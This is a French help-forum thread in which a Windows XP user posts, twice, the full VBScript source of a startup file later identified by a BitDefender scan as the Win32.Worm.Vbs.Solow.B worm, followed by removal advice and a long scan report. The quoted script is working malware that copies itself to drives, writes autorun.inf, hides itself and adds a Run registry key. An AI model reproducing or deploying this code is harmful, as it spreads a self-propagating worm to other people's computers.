Pagefile.sys.vbs ????

Résolu/Fermé
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007 - 8 oct. 2007 à 13:23
 17 ans aigle keyes - 21 août 2010 à 15:46
Bonjour,
Je suis sous Xp
J'ai un fichier nomé "pagefile.sys.vbs" que j'ai repéré parce qu'il se lance au démarage de Windows.
je n'arrive pas à suprimer.
Si quelqu'un pouvait me dire ce que c'est et comment le supprimé.
En voici le contenu.
============================================
nom du fichier "pagefile.sys.vbs"

'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
==========================================================

Merci pour vos informations
Denis

27 réponses

le mieux c de passer par le dos, redemarrez la machine, apuyer sur f8 au moment du boot > choisir "invite de commandes en mode sans echec" puis supprimer manuelement avec la commande "DEL/A:R pagefile.sys.vbs" puis pareil avec autorun.inf et ce sur tout les lecteurs amovible et cle usb... eficace
1
17 ans aigle keyes
21 août 2010 à 15:46
bonjour. sa erres pas êtes plu rapide de formates lordi ? ^^
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
8 oct. 2007 à 13:46
AVG antispyware

https://www.01net.com/telecharger/

Tuto :
http://www.kachouri.com/tuto/tuto-161-avg-anti-spyware-75-pour-votre-securite.html


->Relance AVG AS -> "Analyse" ->"Paramètres"

Sous la question "Comment réagir ?" :

-> clique sur "Actions recommandées" et choisis "Quarantaines"
-> Re-clique sur l'onglet "Analyse" puis réalise une "Analyse complète du système"

Si un fichier est infecté en fin d'analyse

->Clique sur "Appliquer toutes les actions "

->Clique sur "Enregistrer le rapport" puis sur "Enregistrer le rapport sous".

->Enregistre ce fichier texte sur ton bureau ensuite colle le rapport ici




_______________
colle le rapport d'un scan en ligne
avec un des suivants:


bitdefender en ligne :
http://www.bitdefender.fr/scan_fr/scan8/ie.html

scan en ligne firefox

https://www.trendmicro.com/fr_fr/business.html

Panda en ligne :
http://pandasoftware.fr

____________________

si ca persiste

colle un rapport hijackthis

http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

manuel :

https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html


Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.

ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste

Ensuite avec Explorer créer un dossier c:\hijackthis
Décompresser Hijackthis dans ce dossier.
C'est important pour les sauvegardes."
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
8 oct. 2007 à 15:11
Merci pour l'info
Mais j'ai passé avast et ad aware et il n'ont rien détecté. Spybot non plus ?
J'ai restauré mon systhème, à un date ou je savait que ce fichier n'était pas. Il n'st pas réaparue.
Comme je souhaitais savoir ce que c'était et que je n'est pas trouvé d'infi sur google, je l'avais gargé en (.txt)
Donc plus de détection possible pour le moment.
Est ce un logciel espion un virus ?


cordialement,
Denis
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
8 oct. 2007 à 18:03
cela peut etre un fichier de windows mais des fois un virus alors scan avec bitdefender en ligne pour verifier



windows fichier pagefile sys
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
8 oct. 2007 à 18:05
Ok
je vais faire ça.
Personne ne peut déduire ce que c'est en regardant le contenu du fichier ?
Je pensais cela possible.
Denis
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
8 oct. 2007 à 18:11
slt
si tu connais le lien du fichier le mieux est de le faire analyser par virus total ici



https://www.virustotal.com/gui/



il suffit d'envoyer ton fichier et il sera analysé par plusieurs antivirus

a plus
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
8 oct. 2007 à 18:43
je connais le contenu du fichier, je l'ai mis dans mon premier message.
le revoici :
nom du fichier "pagefile.sys.vbs" il se place dans C:\WINDOWS
Contenu :

'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
0
jlpjlp Messages postés 51580 Date d'inscription vendredi 18 mai 2007 Statut Contributeur sécurité Dernière intervention 3 mai 2022 5 040
8 oct. 2007 à 21:54
Salut

Vas sur le site https://virusscan.jotti.org/
- Clic en haut à droite sur "Parcourir", navigue dans les dossiers et sélectionne ce fichier :

C:\WINDOWS\pagefile.sys.vbs

- Clic sur submit toujours en haut à droite
- Le scan va se lancer, ça va prendre un petit instant
- En bas, tu as le résultat du scan, copie/colle le résultat complet du scan ici.
Aide : https://www.malekal.com/scan-antivirus-ligne-nod32/#mozTocId662799
0
joalland Messages postés 39 Date d'inscription jeudi 8 juillet 2004 Statut Membre Dernière intervention 10 octobre 2007
8 oct. 2007 à 22:28
Bonsoir,
Le fichier est revenu, je le retrouce à la racine de tout mes DD.
J'ai fait également un scanne avec Bit défenderen voici le résultat
BitDefender Online Scanner



Rapport d'analyse généré à: Mon, Oct 08, 2007 - 21:41:39





Voie d'analyse: A:\;C:\;D:\;E:\;F:\;G:\;H:\;




Statistiques

Temps
01:58:41

Fichiers
386269

Directoires
14949

Secteurs de boot
6

Archives
4202

Paquets programmes
16344




Résultats

Virus identifiés
7

Fichiers infectés
114

Fichiers suspects
0

Avertissements
0

Désinfectés
0

Fichiers effacés
223




Info sur les moteurs

Définition virus
825589

Version des moteurs
AVCORE v1.0 (build 2422) (i386) (Sep 25 2007 08:26:36)

Analyse des plugins
14

Archive des plugins
38

Unpack des plugins
7

E-mail plugins
6

Système plugins
1




Paramètres d'analyse

Première action
Désinfecté

Seconde Action
Supprimé

Heuristique
Oui

Acceptez les avertissements
Oui

Extensions analysées
*;

Excludez les extensions


Analyse d'emails
Oui

Analyse des Archives
Oui

Analyser paquets programmes
Oui

Analyse des fichiers
Oui

Analyse de boot
Oui




Fichier analysé
Statut

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
Infecté par: Generic.Peed.Eml.09884D34

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
Echec de la désinfection

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
Supprimé

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox
Mis à jour

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
Infecté par: Generic.Peed.Eml.8ABE2DD0

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
Echec de la désinfection

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
Supprimé

C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox
Mis à jour

C:\pagefile.sys.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\pagefile.sys.vbs=>(unicode)
Echec de la désinfection

C:\pagefile.sys.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
Supprimé

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
